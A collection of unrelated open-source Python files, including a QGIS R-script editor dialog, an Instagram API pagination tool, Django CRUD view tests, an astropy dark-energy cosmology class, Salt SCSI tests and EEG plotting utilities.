layout.addWidget(self.buttonBox)
self.setLayout(layout)
QtCore.QMetaObject.connectSlotsByName(self)
def editHelp(self):
if self.alg is None:
alg = RAlgorithm(None, unicode(self.text.toPlainText()))
else:
alg = self.alg
dlg = HelpEditionDialog(alg)
dlg.exec_()
#We store the description string in case there were not saved because there was no
#filename defined yet
if self.alg is None and dlg.descriptions:
self.help = dlg.descriptions
def runAlgorithm(self):
alg = RAlgorithm(None, unicode(self.text.toPlainText()))
alg.provider = Providers.providers['r']
dlg = alg.getCustomParametersDialog()
if not dlg:
dlg = ParametersDialog(alg)
canvas = QGisLayers.iface.mapCanvas()
prevMapTool = canvas.mapTool()
dlg.show()
dlg.exec_()
if canvas.mapTool()!=prevMapTool:
try:
canvas.mapTool().reset()
except:
pass
canvas.setMapTool(prevMapTool)
def saveAlgorithm(self):
if self.filename is None:
self.filename = str(QtGui.QFileDialog.getSaveFileName(self, "Save Script", RUtils.RScriptsFolder(), "SEXTANTE R script (*.rsx)"))
if self.filename:
if not self.filename.endswith(".rsx"):
self.filename += ".rsx"
text = str(self.text.toPlainText())
if self.alg is not None:
self.alg.script = text
try:
fout = open(self.filename, "w")
fout.write(text)
fout.close()
except IOError:
QMessageBox.warning(self,
self.tr("I/O error"),
self.tr("Unable to save edits. Reason:\n %1").arg(unicode(sys.exc_info()[1]))
)
return
self.update = True
#if help strings were defined before saving the model for the first time, we do it here
if self.help:
f = open(self.filename + ".help", "wb")
pickle.dump(self.help, f)
f.close()
self.help = None
QtGui.QMessageBox.information(self, "Script saving", "Script was correctly saved.")
else:
self.filename = None
def cancelPressed(self):
#self.update = False
self.close()
| slarosa/QGIS | python/plugins/sextante/r/EditRScriptDialog.py | Python | gpl-2.0 | 5,932 |
#!/usr/bin/env python
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
#
# Copyright 2015 Michael Pitidis
"""
Retrieve posts, comments and likes through the Instagram API.
"""
import requests
import sys, os, json, collections, argparse
from datetime import datetime
API_URL = 'https://api.instagram.com/v1'
def main(args):
opts = parse_cli(args[1:], default_endpoints().keys(), API_URL)
return process(opts, default_endpoints(), default_parameters())
def default_endpoints():
return dict(
tags = paginate_tags
, comments = no_pagination
, likes = no_pagination
)
def default_parameters():
return dict(
tags = dict(count = 50, min_tag_id = tag_window(int(datetime.now().strftime("%s")) - 24 * 3600 * 3))
, comments = dict(count = 200) # in practice no more than 150 will be returned
, likes = dict(count = 200) # in practice no more than 120 will be returned
)
def process(opts, endpoints, parameters):
if not os.path.isdir(opts.destination):
os.makedirs(opts.destination)
objects = one_of(opts.objects, opts.objects_file)
tokens = one_of(opts.tokens, opts.tokens_file)
params = parameters[opts.endpoint]
paginator = endpoints[opts.endpoint]
if opts.query_parameters:
params.update(opts.query_parameters)
params['count'] = opts.limit
ramp_up = geometric_ramp_up(opts.limit_factor, opts.limit_max)
progress = write_flush if opts.verbose else lambda x: x
serialize = choose_serializer(opts.type)
fmt = dict(endpoint=opts.endpoint, type=opts.type.replace('_pretty', ''))
for obj in objects:
if opts.endpoint in ('comments', 'likes'):
url = '%s/media/%s/%s' % (opts.url.rstrip('/'), obj, opts.endpoint)
else:
url = '%s/%s/%s/media/recent' % (opts.url.rstrip('/'), opts.endpoint, obj)
count = 0
for i, entry in enumerate(paginator(url, params, tokens, ramp_up), 1):
fmt.update(dict(object=obj, i=i))
write_file(os.path.join(opts.destination, opts.format % fmt), serialize(entry), opts.overwrite)
count += len(entry['content'].get('data', []))
progress("\r%s %d" % (obj, count))
progress('\n')
return 0
def choose_serializer(t):
if t == 'yaml':
try:
import yaml
return lambda x: yaml.safe_dump(x, default_flow_style=False, encoding='utf8', allow_unicode=True, width=1024**3)
except ImportError:
sys.stderr.write("python-yaml not available, using json format\n")
if t == 'json_pretty':
return lambda x: json.dumps(x, indent=2)
return json.dumps
def paginate_tags(endpoint, parameters, tokens, ramp_up = lambda x: x):
return paginate(endpoint, parameters, tokens, extract_tags)
def no_pagination(endpoint, parameters, tokens, ramp_up = None):
# no cursor information to extract
return paginate(endpoint, parameters, tokens, cursor_extractor = lambda x: x)
def paginate(endpoint, parameters, tokens, cursor_extractor, ramp_up = lambda x: x):
"""Paginate through a graph endpoint using cursors."""
params = dict(parameters)
queue = collections.deque(tokens)
while True:
params['access_token'] = queue.popleft()
response = requests.get(endpoint, params=params)
content = parse_response(response)
yield dict(content=content, status=response.status_code, endpoint=endpoint, parameters=params)
cursors = cursor_extractor(content)
data = content.get('data', [])
if data and valid_tag_cursors(cursors, params):
queue.append(params['access_token'])
params.update(cursors)
if 'count' in params:
params['count'] = ramp_up(params['count'])
else:
break
def tag_window(timestamp):
epoch = 1314220021721
base = timestamp * 1000 - epoch
return base << (64 - 41)
def post_date(post_id):
epoch = 1314220021721
base = long(post_id.split('_')[0]) >> (64 - 41)
return (base + epoch) / 1000
def valid_tag_cursors(cursors, params):
key = 'max_tag_id'
return key in cursors and cursors.get(key) != params.get(key)
def extract_tags(c):
pagination = c.get('pagination', {})
cursors = dict()
max_id = pagination.get('next_max_tag_id')
if max_id is None and c.get('data', []):
max_id = min(int(e['id'].split('_')[0]) for e in c.get('data', []))
#min_id = pagination.get('min_tag_id') # How about keeping the existing one?
if max_id is not None:
cursors['max_tag_id'] = max_id
#if min_id is not None:
# cursors['min_tag_id'] = min_id
return cursors
def extract_query(s):
parts = s.split('?', 1)
if len(parts) == 2:
return dict(p.split('=', 1) for p in parts[1].split('&'))
return dict()
def one_of(*lists):
return tuple(e.strip() for l in lists if l is not None for e in l)
def write_flush(s):
sys.stderr.write(s)
sys.stderr.flush()
def write_file(filename, data, overwrite=False):
assert overwrite or not os.path.exists(filename) # XXX: race condition
with open(filename, 'wt') as fd:
fd.write(data)
def geometric_ramp_up(multiplier, ceiling):
return lambda x: min(ceiling, x * multiplier)
def parse_response(r):
try:
return r.json()
except:
return dict(error=r.text)
def parse_cli(args, endpoints, graph_url):
parser = argparse.ArgumentParser(
description='Paginate through the Facebook Graph API',
epilog='')
out = parser.add_argument_group('output').add_argument
out('-d', '--destination', default='.', metavar='DIRECTORY',
help='set output directory [%(default)s]')
out('--type', choices=('json', 'json_pretty', 'yaml'), default='json',
help='set output file type [%(default)s]')
out('--format', default='%(endpoint)s-%(object)s-%(i)04d.%(type)s',
help='set output file format [%(default)s]')
out('--overwrite', action='store_true',
help='overwrite output files')
out('-v', '--verbose', action='store_true',
help='print progress information on standard error')
req = parser.add_argument_group('requests').add_argument
req('-u', '--url', default=graph_url,
help='set API base url [%(default)s]')
req('-q', '--query-parameters', nargs=2, action='append', metavar=('KEY', 'VALUE'),
help='specify additional query parameters, e.g. -q fields id,message')
limits = parser.add_argument_group('limits').add_argument
limits('-l', '--limit', type=int, default=33,
help='set the initial request limit [%(default)s]')
limits('--limit-max', type=int, default=200,
help='set the maximum request limit [%(default)s]')
limits('--limit-factor', type=int, default=2,
help='set limit multiplication factor [%(default)s]')
tokens = parser.add_argument_group('tokens').add_argument
t1 = tokens('-t', '--tokens', nargs='+', metavar='TOKEN',
help='provide a pool of access tokens for performing requests')
t2 = tokens('--tokens-file', type=argparse.FileType('rt'), metavar='FILENAME',
help='read access tokens from a file one per line')
objects = parser.add_argument_group('targets').add_argument
objects('-e', '--endpoint', choices=endpoints, required=True,
help='choose request endpoint')
o1 = objects('objects', metavar='ID', nargs='*',
help='Instagram IDs to retrieve data for')
o2 = objects('--objects-file', type=argparse.FileType('rt'), metavar='FILENAME',
help='read object IDs from a file one per line')
opts = parser.parse_args(args)
if not (opts.objects or opts.objects_file):
parser.error("at least one %s or %s is required" % (o1.metavar, '/'.join(o2.option_strings)))
if not (opts.tokens or opts.tokens_file):
parser.error("at least one of %s or %s is required" % ('/'.join(t1.option_strings), '/'.join(t2.option_strings)))
return opts
if __name__ == '__main__':
sys.exit(main(sys.argv))
| mpitid/apiutils | instagram/instapi.py | Python | lgpl-2.1 | 8,762 |
#!/usr/bin/env python3
# Copyright 2019 Canonical Ltd.
# Licensed under the AGPLv3, see LICENCE file for details.
import argparse
import re
import sys
def main(args):
p = argparse.ArgumentParser(description="parse claim log files, reporting output")
p.add_argument("file", type=argparse.FileType('r'), default=sys.stdin, nargs="?",
help="the name of the file to parse")
p.add_argument("--tick", type=float, default=1.0,
help="seconds between printing status ticks")
opts = p.parse_args(args)
actionsRE = re.compile("\s*(?P<time>\d+\.\d\d\d)s\s+(?P<action>claimed|extended|lost|connected).*in (?P<duration>[0-9m.]+s)")
# We don't have minutes if we have 'ms', so match 'ms' first, we might have 'm' if we have 's', so put it before s.
durationRE = re.compile("((?P<milliseconds>\d+)ms)?((?P<minutes>\d+)m)?((?P<seconds>\d+(\.\d+)?)s)?")
totalClaims = 0
extendedSum = 0
extendedCount = 0
lostCount = 0
lastTime = 0
claimSum = 0
claimCount = 0
print("claims\tclaim time\textend time\tlost")
for line in opts.file:
m = actionsRE.match(line.strip())
if m is None:
continue
curTime, action, duration = m.group('time', 'action', 'duration')
curTime = float(curTime)
m2 = durationRE.match(duration)
if m2 is None:
print("could not match %q" % (duration,))
continue
m, s, ms = m2.group("minutes", "seconds", "milliseconds")
delta = 0
if m is not None:
delta += float(m)*60
if s is not None:
delta += float(s)
if ms is not None:
delta += float(ms) * 0.001
delta = round(delta, 3)
# print(action, duration, delta)
if action == "extended":
extendedCount += 1
extendedSum += delta
elif action == "lost":
totalClaims -= 1
lostCount += 1
elif action == "claimed":
totalClaims += 1
claimCount += 1
claimSum += delta
if curTime - lastTime > opts.tick:
lastTime = curTime
claimMsg = ""
if claimCount > 0:
claimAvg = claimSum / claimCount
claimCount = 0
claimSum = 0
claimMsg = "%9.3f" % (claimAvg,)
extendedMsg = " "*9
if extendedCount > 0:
extendedAvg = extendedSum / extendedCount
extendedSum = 0
extendedCount = 0
extendedMsg = "%9.3f" %(extendedAvg,)
print("%5d\t%9s\t%9s\t%d" % (totalClaims, claimMsg, extendedMsg, lostCount))
if __name__ == "__main__":
main(sys.argv[1:])
| freyes/juju | scripts/leadershipclaimer/count-leadership.py | Python | agpl-3.0 | 2,748 |
from astropy.cosmology import FLRW
from astropy import units as u
from astropy.utils.misc import isiterable
import numpy as np
class n7CPL(FLRW):
"""FLRW cosmology with a n=7 nCPL dark energy equation of state and curvature.
The equation for the dark energy equation of state uses the
nCPL form as described in Pantazis et al. (2016):
:math:`w(z) = w_0 + w_a (1-a)^n = w_0 + w_a z^n / (1+z)^n`.
Parameters
----------
H0 : float or `~astropy.units.Quantity`
Hubble constant at z = 0. If a float, must be in [km/sec/Mpc]
Om0 : float
Omega matter: density of non-relativistic matter in units of the
critical density at z=0.
Ode0 : float
Omega dark energy: density of dark energy in units of the critical
density at z=0.
w0 : float, optional
Dark energy equation of state at z=0 (a=1). This is pressure/density
for dark energy in units where c=1.
wa : float, optional
Negative derivative of the dark energy equation of state with respect
to the scale factor. A cosmological constant has w0=-1.0 and wa=0.0.
Tcmb0 : float or scalar `~astropy.units.Quantity`, optional
Temperature of the CMB z=0. If a float, must be in [K].
Default: 2.725 [K]. Setting this to zero will turn off both photons
and neutrinos (even massive ones).
Neff : float, optional
Effective number of Neutrino species. Default 3.04.
m_nu : `~astropy.units.Quantity`, optional
Mass of each neutrino species. If this is a scalar Quantity, then all
neutrino species are assumed to have that mass. Otherwise, the mass of
each species. The actual number of neutrino species (and hence the
number of elements of m_nu if it is not scalar) must be the floor of
Neff. Typically this means you should provide three neutrino masses
unless you are considering something like a sterile neutrino.
Ob0 : float or None, optional
Omega baryons: density of baryonic matter in units of the critical
density at z=0. If this is set to None (the default), any
computation that requires its value will raise an exception.
name : str, optional
Name for this cosmological object.
Examples
--------
>>> from astropy.cosmology import w0waCDM
>>> cosmo = n7CPL(H0=70, Om0=0.3, Ode0=0.7, w0=-0.9, wa=0.2)
The comoving distance in Mpc at redshift z:
>>> z = 0.5
>>> dc = cosmo.comoving_distance(z)
"""
def __init__(self, H0, Om0, Ode0, w0=-1., wa=0., Tcmb0=2.725,
Neff=3.04, m_nu=u.Quantity(0.0, u.eV), Ob0=None, name=None):
FLRW.__init__(self, H0, Om0, Ode0, Tcmb0, Neff, m_nu, name=name,
Ob0=Ob0)
self._w0 = float(w0)
self._wa = float(wa)
# Please see "Notes about speeding up integrals" for discussion
# about what is being done here.
'''
if self._Tcmb0.value == 0:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc_norel
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._w0, self._wa)
elif not self._massivenu:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc_nomnu
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._Ogamma0 + self._Onu0,
self._w0, self._wa)
else:
self._inv_efunc_scalar = scalar_inv_efuncs.w0wacdm_inv_efunc
self._inv_efunc_scalar_args = (self._Om0, self._Ode0, self._Ok0,
self._Ogamma0, self._neff_per_nu,
self._nmasslessnu,
self._nu_y_list, self._w0,
self._wa)
'''
@property
def w0(self):
""" Dark energy equation of state at z=0"""
return self._w0
@property
def wa(self):
""" Negative derivative of dark energy equation of state w.r.t. a"""
return self._wa
def w(self, z):
"""Returns dark energy equation of state at redshift ``z``.
Parameters
----------
z : array-like
Input redshifts.
Returns
-------
w : ndarray, or float if input scalar
The dark energy equation of state
Notes
------
The dark energy equation of state is defined as
:math:`w(z) = P(z)/\\rho(z)`, where :math:`P(z)` is the
pressure at redshift z and :math:`\\rho(z)` is the density
at redshift z, both in units where c=1. Here this is
:math:`w(z) = w_0 + w_a (1 - a)^n = w_0 + w_a \\frac{z^n}{(1+z)^n}`.
"""
if isiterable(z):
z = np.asarray(z)
return self._w0 + self._wa * z**7 / ( (1.0 + z)**7)
def de_density_scale(self, z):
""" Evaluates the redshift dependence of the dark energy density.
Parameters
----------
z : array-like
Input redshifts.
Returns
-------
I : ndarray, or float if input scalar
The scaling of the energy density of dark energy with redshift.
Notes
-----
The scaling factor, I, is defined by :math:`\\rho(z) = \\rho_0 I`,
and in this case is given by
.. math::
I = \\left(1 + z\\right)^{3 \\left(1 + w_0 + w_a\\right)}
\exp \\left(-3 w_a \\frac{z}{1+z}\\right)
"""
if isiterable(z):
z = np.asarray(z)
zp1 = 1.0 + z
aa = 1. / zp1
return zp1 ** (3 * (1 + self._w0 + self._wa)) * \
np.exp(-self._wa * (1 - aa) * (60*aa**6 - 430*aa**5 + 1334*aa**4 - 2341*aa**3 + 2559*aa**2 - 1851*aa + 1089) / 140.)
def __repr__(self):
retstr = "{0}H0={1:.3g}, Om0={2:.3g}, "\
"Ode0={3:.3g}, w0={4:.3g}, wa={5:.3g}, Tcmb0={6:.4g}, "\
"Neff={7:.3g}, m_nu={8}, Ob0={9:s})"
return retstr.format(self._namelead(), self._H0, self._Om0,
self._Ode0, self._w0, self._wa,
self._Tcmb0, self._Neff, self.m_nu,
_float_or_none(self._Ob0)) | per-andersen/Deltamu | n7CPL.py | Python | gpl-3.0 | 6,396 |
from share.provider import OAIProviderAppConfig
class AppConfig(OAIProviderAppConfig):
name = 'providers.pe.upc'
version = '0.0.1'
title = 'Universidad Peruana de Ciencias Aplicadas (UPC)'
long_title = 'Universidad Peruana de Ciencias Aplicadas (UPC)'
home_page = 'http://repositorioacademico.upc.edu.pe'
url = 'http://repositorioacademico.upc.edu.pe/upc/oai/request'
| zamattiac/SHARE | providers/pe/upc/apps.py | Python | apache-2.0 | 394 |
#!/usr/bin/env python
# coding: utf-8
import os, re
from setuptools import setup, find_packages
PKG='txoauth'
VERSIONFILE = os.path.join('txoauth', '_version.py')
verstr = "unknown"
try:
verstrline = open(VERSIONFILE, "rt").read()
except EnvironmentError:
pass # Okay, there is no version file.
else:
MVSRE = r"^manual_verstr *= *['\"]([^'\"]*)['\"]"
mo = re.search(MVSRE, verstrline, re.M)
if mo:
mverstr = mo.group(1)
else:
print "unable to find version in %s" % (VERSIONFILE,)
raise RuntimeError("if %s.py exists, it must be well-formed" % (VERSIONFILE,))
AVSRE = r"^auto_build_num *= *['\"]([^'\"]*)['\"]"
mo = re.search(AVSRE, verstrline, re.M)
if mo:
averstr = mo.group(1)
else:
averstr = ''
verstr = '.'.join([mverstr, averstr])
trove_classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: BSD License",
"License :: DFSG approved",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Topic :: Utilities",
"Topic :: Software Development :: Libraries",
]
setup(
name="txoauth",
version=verstr,
description="provides OAuth 2.0 support for Twisted.",
author="Zooko Ofsimplegeo", # original author: Laurens Van Houtven
author_email="zooko@simplegeo.com",
url="https://github.com/simplegeo/txoauth",
packages = find_packages(),
test_suite="txoauth.test",
install_requires=["Twisted >= 9.0.0"],
setup_requires=['setuptools_trial'],
tests_require=['mock'],
license = "BSD",
classifiers=trove_classifiers,
zip_safe = False, # We prefer unzipped for easier access.
)
| simplegeo/txoauth-OLD | setup.py | Python | mit | 1,889 |
# -*- coding: utf-8 -*-
import json
from django.test import TestCase
from django.test.client import RequestFactory
from djangular.views.crud import NgCRUDView
from djangular.views.mixins import JSONResponseMixin
from server.models import DummyModel, DummyModel2, SimpleModel, M2MModel
class CRUDTestViewWithM2M(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = M2MModel
class CRUDTestViewWithFK(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = DummyModel
class CRUDTestView(JSONResponseMixin, NgCRUDView):
"""
Include JSONResponseMixin to make sure there aren't any problems when using both together
"""
model = DummyModel2
class CRUDTestViewWithSlug(NgCRUDView):
"""
Differs from CRUDTestViewWithFK in slug field 'email', which has a 'unique' constraint and
can be used as an alternative key (for GET operations only).
"""
model = SimpleModel
slug_field = 'email'
class CRUDViewTest(TestCase):
names = ['John', 'Anne', 'Chris', 'Beatrice', 'Matt']
emails = ["@".join((name, "example.com")) for name in names]
def setUp(self):
self.factory = RequestFactory()
# DummyModel2 and DummyModel / CRUDTestViewWithFK
model2 = DummyModel2(name="Model2 name")
model2.save()
for name in self.names:
DummyModel(name=name, model2=model2).save()
# SimpleModel / CRUDTestViewWithSlug
for name, email in zip(self.names, self.emails):
SimpleModel(name=name, email=email).save()
# model with m2m relationship
dummy_model2 = DummyModel2(name="Mathilde")
dummy_model2.save()
self.m2m_model = M2MModel()
self.m2m_model.save()
self.m2m_model.dummy_models.add(dummy_model2)
self.m2m_model.save()
def test_ng_query(self):
# CRUDTestViewWithFK
request = self.factory.get('/crud/')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
for obj in data:
db_obj = DummyModel.objects.get(pk=obj['pk'])
self.assertEqual(obj['name'], db_obj.name)
# CRUDTestViewWithSlug
request2 = self.factory.get('/crud/')
response2 = CRUDTestViewWithSlug.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
for obj in data2:
db_obj = SimpleModel.objects.get(email=obj['email'])
self.assertEqual(obj['name'], db_obj.name)
def test_ng_get(self):
# CRUDTestViewWithFK
request = self.factory.get('/crud/?pk=1')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(self.names[0], data['name'])
# CRUDTestViewWithSlug
request2 = self.factory.get('/crud/?email={0}'.format(self.emails[0]))
response2 = CRUDTestViewWithSlug.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(self.names[0], data2['name'])
def test_ng_save_create(self):
# CRUDTestViewWithFK
request = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard'}),
content_type='application/json')
response = CRUDTestView.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
pk = data['pk']
request2 = self.factory.get('/crud/?pk={0}'.format(pk))
response2 = CRUDTestView.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(data2['name'], 'Leonard')
# CRUDTestViewWithSlug
request3 = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard', 'email': 'Leonard@example.com'}),
content_type='application/json')
CRUDTestViewWithSlug.as_view()(request3)
request4 = self.factory.get('/crud/?email={0}'.format('Leonard@example.com'))
response4 = CRUDTestViewWithSlug.as_view()(request4)
data4 = json.loads(response4.content.decode('utf-8'))
self.assertEqual(data4['name'], 'Leonard')
request5 = self.factory.post('/crud/',
data=json.dumps({'name': 'Leonard2', 'email': 'Leonard@example.com'}),
content_type='application/json')
response5 = CRUDTestViewWithSlug.as_view()(request5)
self.assertGreaterEqual(response5.status_code, 400)
data5 = json.loads(response5.content.decode('utf-8'))
self.assertTrue('detail' in data5 and 'email' in data5['detail'] and len(data5['detail']['email']) > 0)
def test_ng_save_update(self):
# CRUDTestViewWithFK
request = self.factory.post('/crud/?pk=1',
data=json.dumps({'pk': 1, 'name': 'John2'}),
content_type='application/json')
response = CRUDTestView.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
self.assertEqual(data['name'], 'John2')
request2 = self.factory.get('/crud/?pk=1')
response2 = CRUDTestView.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
self.assertEqual(data2['name'], 'John2')
# CRUDTestViewWithSlug
request3 = self.factory.post('/crud/?pk=1',
data=json.dumps({'name': 'John', 'email': 'John2@example.com'}),
content_type='application/json')
response3 = CRUDTestViewWithSlug.as_view()(request3)
data3 = json.loads(response3.content.decode('utf-8'))
self.assertEqual(data3['name'], 'John')
self.assertEqual(data3['email'], 'John2@example.com')
request4 = self.factory.get('/crud/?email=John2@example.com')
response4 = CRUDTestViewWithSlug.as_view()(request4)
data4 = json.loads(response4.content.decode('utf-8'))
self.assertEqual(data4['name'], 'John')
request5 = self.factory.post('/crud/?pk=3', # Modifying "Chris"
data=json.dumps({'pk': 4, 'name': 'John2', 'email': 'John2@example.com'}),
content_type='application/json')
response5 = CRUDTestViewWithSlug.as_view()(request5)
self.assertGreaterEqual(response5.status_code, 400)
data5 = json.loads(response5.content.decode('utf-8'))
self.assertTrue('detail' in data5 and 'email' in data5['detail'] and len(data5['detail']['email']) > 0)
def test_ng_delete(self):
# CRUDTestViewWithFK
request = self.factory.delete('/crud/?pk=1')
response = CRUDTestViewWithFK.as_view()(request)
data = json.loads(response.content.decode('utf-8'))
deleted_name = data['name']
request2 = self.factory.get('/crud/')
response2 = CRUDTestViewWithFK.as_view()(request2)
data2 = json.loads(response2.content.decode('utf-8'))
for obj in data2:
self.assertTrue(deleted_name != obj['name'])
# CRUDTestViewWithSlug delete is not different from CRUDTestViewWithFK only testing error status codes
request3 = self.factory.delete('/crud/?email=Anne@example.com') # Missing pk
response3 = CRUDTestViewWithSlug.as_view()(request3)
self.assertEqual(response3.status_code, 400)
request4 = self.factory.delete('/crud/?pk=100') # Invalid pk
response4 = CRUDTestViewWithSlug.as_view()(request4)
self.assertEqual(response4.status_code, 404)
# Testing with m2m relationship
request5 = self.factory.delete('/crud/?pk=%s' % self.m2m_model.pk)
response5 = CRUDTestViewWithM2M.as_view()(request5)
self.assertEqual(response5.status_code, 200)
| vaniakov/django-angular | examples/server/tests/test_crud.py | Python | mit | 8,124 |
""" Testing ``isestimable`` in regression module
"""
from __future__ import absolute_import
import numpy as np
from ..regression import isestimable
from numpy.testing import (assert_almost_equal,
assert_array_equal)
from nose.tools import (assert_true, assert_false, assert_raises,
assert_equal, assert_not_equal)
def test_estimable():
rng = np.random.RandomState(20120713)
N, P = (40, 10)
X = rng.normal(size=(N, P))
C = rng.normal(size=(1, P))
assert_true(isestimable(C, X))
assert_true(isestimable(np.eye(P), X))
for row in np.eye(P):
assert_true(isestimable(row, X))
X = np.ones((40, 2))
assert_true(isestimable([1, 1], X))
assert_false(isestimable([1, 0], X))
assert_false(isestimable([0, 1], X))
assert_false(isestimable(np.eye(2), X))
halfX = rng.normal(size=(N, 5))
X = np.hstack([halfX, halfX])
assert_false(isestimable(np.hstack([np.eye(5), np.zeros((5, 5))]), X))
assert_false(isestimable(np.hstack([np.zeros((5, 5)), np.eye(5)]), X))
assert_true(isestimable(np.hstack([np.eye(5), np.eye(5)]), X))
# Test array-like for design
XL = X.tolist()
assert_true(isestimable(np.hstack([np.eye(5), np.eye(5)]), XL))
# Test ValueError for incorrect number of columns
X = rng.normal(size=(N, 5))
for n in range(1, 4):
assert_raises(ValueError, isestimable, np.ones((n,)), X)
assert_raises(ValueError, isestimable, np.eye(4), X)
| alexis-roche/nipy | nipy/algorithms/statistics/models/tests/test_estimable.py | Python | bsd-3-clause | 1,497 |
#!/usr/bin/env python3
from flask import *
from meteorismo import app
| iomataani/meteorismo | main.py | Python | gpl-2.0 | 70 |
"""
:codeauthor: Jayesh Kariya <jayeshk@saltstack.com>
"""
import copy
import os
import pytest
import salt.modules.scsi as scsi
import salt.utils.path
from tests.support.mock import MagicMock, patch
@pytest.fixture
def configure_loader_modules():
return {scsi: {}}
def test_ls_():
"""
Test for list SCSI devices, with details
"""
lsscsi = {
"stdout": "[0:0:0:0] disk HP LOGICAL VOLUME 6.68 /dev/sda [8:0]",
"stderr": "",
"retcode": 0,
}
lsscsi_size = {
"stdout": "[0:0:0:0] disk HP LOGICAL VOLUME 6.68 /dev/sda [8:0] 1.20TB",
"stderr": "",
"retcode": 0,
}
result = {
"[0:0:0:0]": {
"major": "8",
"lun": "0:0:0:0",
"device": "/dev/sda",
"model": "LOGICAL VOLUME 6.68",
"minor": "0",
"size": None,
}
}
result_size = copy.deepcopy(result)
result_size["[0:0:0:0]"]["size"] = "1.20TB"
mock = MagicMock(return_value="/usr/bin/lsscsi")
with patch.object(salt.utils.path, "which", mock):
# get_size = True
cmd_mock = MagicMock(return_value=lsscsi_size)
with patch.dict(scsi.__salt__, {"cmd.run_all": cmd_mock}):
assert scsi.ls_() == result_size
with patch.dict(lsscsi_size, {"retcode": 1, "stderr": "An error occurred"}):
assert scsi.ls_() == "An error occurred"
with patch.dict(
lsscsi_size,
{"retcode": 1, "stderr": "lsscsi: invalid option -- 's'\nUsage:"},
):
assert (
scsi.ls_() == "lsscsi: invalid option -- 's' - try get_size=False"
)
# get_size = False
cmd_mock = MagicMock(return_value=lsscsi)
with patch.dict(scsi.__salt__, {"cmd.run_all": cmd_mock}):
assert scsi.ls_(get_size=False) == result
mock = MagicMock(return_value=None)
with patch.object(salt.utils.path, "which", mock):
assert scsi.ls_() == "scsi.ls not available - lsscsi command not found"
def test_rescan_all():
"""
Test for list scsi devices
"""
mock = MagicMock(side_effect=[False, True])
with patch.object(os.path, "isdir", mock):
assert scsi.rescan_all("host") == "Host host does not exist"
with patch.dict(scsi.__salt__, {"cmd.run": MagicMock(return_value="A")}):
assert scsi.rescan_all("host") == ["A"]
| saltstack/salt | tests/pytests/unit/modules/test_scsi.py | Python | apache-2.0 | 2,457 |
"""
Utilities for plotting various figures and animations in EEG101.
"""
# Author: Hubert Banville <hubert@neurotechx.com>
#
# License: TBD
import numpy as np
import matplotlib.pylab as plt
import collections
from scipy import signal
def dot_plot(x, labels, step=1, figsize=(12,8)):
"""
Make a 1D dot plot.
Inputs
x : 1D array containing the points to plot
labels : 1D array containing the label for each point in x
step : vertical space between two points
"""
# Get the histogram for each class
classes = np.unique(labels)
hist = [np.histogram(x[labels==c], density=True) for c in classes]
# Prepare the figure
fig, ax = plt.subplots(figsize=figsize)
for hi, h in enumerate(hist):
bin_centers = (h[1][1:] + h[1][0:-1])/2. # Get bin centers
# Format the data so that each bin has as many points as the histogram bar for that bin
x1 = []
y1 = []
for i, j in zip(np.round(h[0]).astype(int), bin_centers):
y = range(0, i, step)
y1 += y
x1 += [j]*len(y)
# Plot
ax.plot(x1, (-1)**hi*np.array(y1), 'o', markersize=10, label=classes[hi])
ax.legend(scatterpoints=1)
ax.set_xlabel('Alpha power')
ax.set_ylabel('Number of points')
ax.set_yticklabels([])
ax.set_yticks([])
ax.legend()
plt.tight_layout()
def psd_with_bands_plot(f, psd, figsize=(12,8)):
"""
Plot a static PSD.
INPUTS
f : 1D array containing frequencies of the PSD
psd : 1D array containing the power at each frequency in f
figsize : figure size
"""
bands = collections.OrderedDict()
bands[r'$\delta$'] = (0,4)
bands[r'$\theta$'] = (4,8)
bands[r'$\alpha$'] = (8,13)
bands[r'$\beta$'] = (13, 30)
bands[r'$\gamma$'] = (30, 120)
fig, ax = plt.subplots(figsize=figsize)
ax.plot(f, psd)
ax.set_xlabel('Frequency (Hz)')
ax.set_ylabel('Power (dB)')
ylim = ax.get_ylim()
for i, [bkey, bfreq] in enumerate(bands.iteritems()):
ind = (f>=bfreq[0]) & (f<=bfreq[1])
f1 = f[ind]
y1 = psd[ind]
ax.fill_between(f1, y1, ylim[0], facecolor=[(0.7, i/5., 0.7)], alpha=0.5)
ax.text(np.mean(f1), (ylim[0] + ylim[1])/1.22, bkey, fontsize=16, verticalalignment='top', horizontalalignment='center')
ax.set_xlim([min(f), max(f)])
def sinewave(A, f, phi, t):
"""
Return a sine wave with specified parameters at the given time points.
INPUTS
A : Amplitude
f : Frequency (Hz)
phi : Phase (rad)
t : time (in s)
"""
return A*np.sin(2*np.pi*f*t + phi)
